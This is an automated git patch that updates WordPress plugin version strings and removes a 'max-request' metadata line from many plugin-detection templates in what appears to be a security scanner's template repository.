 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From dd0d4790080443782c04c089e4f14375754e1508 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 29 Sep 2023 04:02:18 +0000
Subject: [PATCH 0588/1090] Auto WordPress Plugins Update [Fri Sep 29 04:02:18
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/all-in-one-seo-pack.txt               | 2 +-
 helpers/wordpress/plugins/contact-form-7.txt                    | 2 +-
 helpers/wordpress/plugins/optinmonster.txt                      | 2 +-
 helpers/wordpress/plugins/shortpixel-image-optimiser.txt        | 2 +-
 helpers/wordpress/plugins/the-events-calendar.txt               | 2 +-
 helpers/wordpress/plugins/wpforms-lite.txt                      | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml            | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml             | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml      | 1 -
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml                | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml         | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml    | 1 -
 .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml  | 1 -
 http/technologies/wordpress/plugins/amp.yaml                    | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml            | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml          | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml            | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml               | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml     | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml          | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml       | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                 | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml    | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml             | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml         | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml        | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml           | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                   | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml               | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml          | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml            | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml         | 1 -
 .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml         | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml     | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml        | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml          | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml     | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml    | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml           | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml    | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml       | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml      | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml         | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml             | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml      | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml          | 1 -
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/elementor.yaml              | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml       | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml   | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml        | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml  | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml   | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml             | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml      | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml      | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml               | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml             | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml           | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml          | 1 -
 http/technologies/wordpress/plugins/formidable.yaml             | 1 -
 http/technologies/wordpress/plugins/forminator.yaml             | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml    | 1 -
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml    | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml       | 1 -
 .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml        | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml             | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml             | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml              | 1 -
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml           | 1 -
 .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml          | 1 -
 http/technologies/wordpress/plugins/health-check.yaml           | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml            | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml    | 1 -
 http/technologies/wordpress/plugins/imagify.yaml                | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml               | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml           | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml         | 1 -
 .../wordpress/plugins/intuitive-custom-post-order.yaml          | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml             | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml          | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml                | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml         | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                  | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                 | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml        | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml   | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml         | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml              | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml       | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml               | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml            | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml           | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml       | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml               | 1 -
 http/technologies/wordpress/plugins/members.yaml                | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml               | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml              | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml             | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml             | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml        | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml            | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml            | 1 -
 .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml  | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml           | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml           | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml     | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml           | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml          | 1 -
 http/technologies/wordpress/plugins/polylang.yaml               | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml          | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml            | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml              | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml       | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml         | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml            | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml  | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml      | 1 -
 http/technologies/wordpress/plugins/redirection.yaml            | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml        | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml  | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml               | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml       | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml          | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml            | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml    | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml           | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml             | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml              | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml      | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml         | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml      | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml  | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml         | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml            | 1 -
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml             | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml   | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml    | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml    | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml       | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml          | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml        | 1 -
 .../technologies/wordpress/plugins/under-construction-page.yaml | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml            | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml           | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml       | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml             | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml         | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml             | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml           | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml             | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml        | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml        | 1 -
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml    | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml           | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml   | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml          | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml         | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml   | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml              | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml     | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml          | 1 -
 http/technologies/wordpress/plugins/worker.yaml                 | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml     | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml               | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml             | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml         | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml         | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml           | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml         | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml  | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml            | 1 -
 206 files changed, 6 insertions(+), 206 deletions(-)

diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
index b58299c38c..3401474547 100644
--- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt
+++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt
@@ -1 +1 @@
-4.4.6
\ No newline at end of file
+4.4.7
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt
index ac301e4f5c..885bc9f72d 100644
--- a/helpers/wordpress/plugins/contact-form-7.txt
+++ b/helpers/wordpress/plugins/contact-form-7.txt
@@ -1 +1 @@
-5.8
\ No newline at end of file
+5.8.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt
index e02b2e809e..575a07b9f9 100644
--- a/helpers/wordpress/plugins/optinmonster.txt
+++ b/helpers/wordpress/plugins/optinmonster.txt
@@ -1 +1 @@
-2.13.8
\ No newline at end of file
+2.14.0
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt
index f430587706..b5db1702f3 100644
--- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt
+++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt
@@ -1 +1 @@
-5.4.2
\ No newline at end of file
+5.4.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt
index 30bc70ba1b..0739cec88a 100644
--- a/helpers/wordpress/plugins/the-events-calendar.txt
+++ b/helpers/wordpress/plugins/the-events-calendar.txt
@@ -1 +1 @@
-6.2.2
\ No newline at end of file
+6.2.2.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt
index cf5c0df72a..7b378be306 100644
--- a/helpers/wordpress/plugins/wpforms-lite.txt
+++ b/helpers/wordpress/plugins/wpforms-lite.txt
@@ -1 +1 @@
-1.8.3.1
\ No newline at end of file
+1.8.4
\ No newline at end of file
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index ebb5ba1042..7cbd1855ae 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
-    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index fddfbf3118..8d579ff23d 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
-    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 7a6e8a76ec..4a6d8b7bbe 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
-    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index 940c0e614c..e4eb308d39 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
-    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index ac77f4e5f5..f68ad2a6bf 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
-    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 90aa5881fd..10f104f2c7 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
-    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 1bf337da6c..8addc28ded 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 7cec152555..2e579621ac 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 8a4b6133cd..41e297ffeb 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
-    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index cfa2e3d080..0dd8686ec3 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
-    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index a92d9bde4e..359671f3bd 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
-    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 59144c7dd5..116e0c420a 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
-    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index df06ba2f35..dc4703ef8d 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 2a79d529cc..1426ac3ef2 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
-    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 556a113acc..78d1651ff4 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
-    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index 58d9a9d738..f7219b373d 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
-    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
